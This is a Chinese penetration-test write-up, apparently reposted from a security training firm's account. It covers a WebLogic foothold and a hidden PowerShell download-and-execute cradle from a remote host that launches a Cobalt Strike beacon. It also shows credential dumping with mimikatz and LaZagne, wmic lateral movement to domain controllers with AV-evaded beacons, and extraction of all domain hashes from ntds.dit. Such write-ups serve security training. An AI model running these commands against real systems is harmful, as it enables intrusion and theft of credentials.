记录某次实战渗透测试过程

admin 2021年10月27日15:59:57安全文章评论22 views2546字阅读8分29秒阅读模式

本文来自宽字节安全第一期线下培训学员Lemon投稿。第二期线下培训预计十一月底开班,欢迎咨询。

号外


宽字节第二期线下培训开始招生啦!!!


宽字节首期内网渗透线上课开班啦!!!


宽字节第二期JAVA安全进阶线上课开班啦!!!




在某次项目中对某个网站的渗透测试,记录一下。

记录某次实战渗透测试过程

先做信息收集,使用oneforall收集一下子域名。

python3 oneforall.py --target xxxxx run
记录某次实战渗透测试过程

在对上面的扫描结果逐一测试的时候,发现某子域名有weblogic漏洞

记录某次实战渗透测试过程

通过weblogic漏洞利用工具扫描发现有CVE_2020_2551漏洞,管理员用户

记录某次实战渗透测试过程

判断是否出网

目标机器出网,并且能和VPS服务器通信

记录某次实战渗透测试过程
记录某次实战渗透测试过程

cs上线

执行poweshell看能不能上线

cmd.exe /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxx'))"

cs可以上线

拿到administrator权限,

记录某次实战渗透测试过程

密码收集

1.执行mimikatz获取密码

logonpasswords
记录某次实战渗透测试过程

2.使用LaZagne取各种连接工具密码、浏览器保存密码等

shell cmd.exe /c D:bealazagne.exe all -oN
记录某次实战渗透测试过程

3.抓取浏览器密码,使用BrowserGhost

记录某次实战渗透测试过程

dump LDAP

查询到目标机器在域内,域用户登录

shell wmic computersystem get domain
记录某次实战渗透测试过程
shell whoami /all
记录某次实战渗透测试过程

前面已经确定目标机器在域内,并且目标机器是域用户登录。

域成员用户可以通过LDAP访问域的目录数据库从而看到整个域的信息。

这是使用的一种方式是通过 ADExplorer软件dump

将ADExplorer.exe上传到目标机器,使用以下命令执行

D:beaxxADExplorer.exe -snapshot "" D:beaxxresult.dat /accepteula
记录某次实战渗透测试过程

将resul.dat 在本地用ADExplorer打开即可看到域的信息

记录某次实战渗透测试过程

扫描内网

查看本机IP,本机IP为192.168.10.3.

使用fscan工具扫描一下192.168.10内网段,从扫描结果看出192.168.10.10和192.168.10.32应该是域控服务器

记录某次实战渗透测试过程
记录某次实战渗透测试过程

横向

通过LDAP和内网扫描看到域内有两台域控:192.168.10.10、192.168.10.32

判断用户权限

shell whoami /all
记录某次实战渗透测试过程
记录某次实战渗透测试过程
shell net group "domain admins" /domain
记录某次实战渗透测试过程

比较幸运,上线就是域管用户可以直接使用域管用户身份横线域内其他机器

先尝试横向域控192.168.10.10机器,wmic可用,通过wmic进行横向

shell wmic /node:192.168.10.10 os get name
记录某次实战渗透测试过程

判断是否有杀软

shell wmic /node:192.168.10.10 process get processid,name
记录某次实战渗透测试过程
记录某次实战渗透测试过程

列出192.168.10.10进程,使用杀软在线查询,目标机器有杀软

判断192.168.10.10是否出网,如果直接执行ping 8.8.8.8或者其他公网地址,但是CS上没有回显就无法判断,在这里分享一下我常用的两种方法:

1.通过DNSlog (http://www.dnslog.cn/)

shell wmic /node:192.168.10.10 process call create "cmd.exe /c ping g2azxa.dnslog.cn"
记录某次实战渗透测试过程

2.通过tcpdump

tcpdump -i 网卡名 icmp

shell wmic /node:192.168.10.10 process call create "cmd.exe /c ping VPSip"
记录某次实战渗透测试过程

两种方法都没有回显,192.168.10.10不出网。

192.168.10.10不出网而且有杀软,先做免杀,然后通过CS的smb隧道将192.168.10.10link上线

在CS上创建SMB监听,使用smb监听生成beacon。

将做好免杀的beacon 上传到192.168.10.10。

记录某次实战渗透测试过程
记录某次实战渗透测试过程
记录某次实战渗透测试过程

通过link192.168.10.10 上线

shell wmic /node:192.168.10.10 process call create "cmd.exe /c c:UsersPublicms.exe c:UsersPublicmnb.bin.new"

link 192.168.10.10
记录某次实战渗透测试过程
记录某次实战渗透测试过程

第一台域控上线,接着横向另一台192.168.10.32机器,方法跟上面一样,判断出网和杀软。

记录某次实战渗透测试过程
记录某次实战渗透测试过程

192.168.10.32出网有杀软,这样就不用通过link上线了,直接做免杀beacon上线就行。

shell wmic /node:192.168.10.32 process call create "cmd.exe /c c:UsersPublicms.exe c:UsersPublicbeacon.bin.new"
记录某次实战渗透测试过程

拿到域控可以导出域hash

Windows的密码是经过hash后存储的,本地存在hklmsam,hklmsystem注册表中

域里面存在域控制器的c:windowsntdsntds.dit中,我们取出来解密即可

shell ntdsutil "activate instance ntds" ifm "create full C:usersPublicntdsutil" quit quit
记录某次实战渗透测试过程

再使用reg命令导出system 和security

  reg save hklmsystem system

  reg save hklmsecurity security
记录某次实战渗透测试过程

使用impacket下的secretsdump.py 解hash

python secretsdump.py -ntds "C:ntdsntds.dit" -security "C:ntdsSECURITY" -system "C:ntdsSYSTEM" local

最后成功获取当前域控中所有域账户和密码

记录某次实战渗透测试过程


欢迎咨询:

记录某次实战渗透测试过程


原文始发于微信公众号(宽字节安全):记录某次实战渗透测试过程

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月27日15:59:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  记录某次实战渗透测试过程 http://cn-sec.com/archives/600697.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: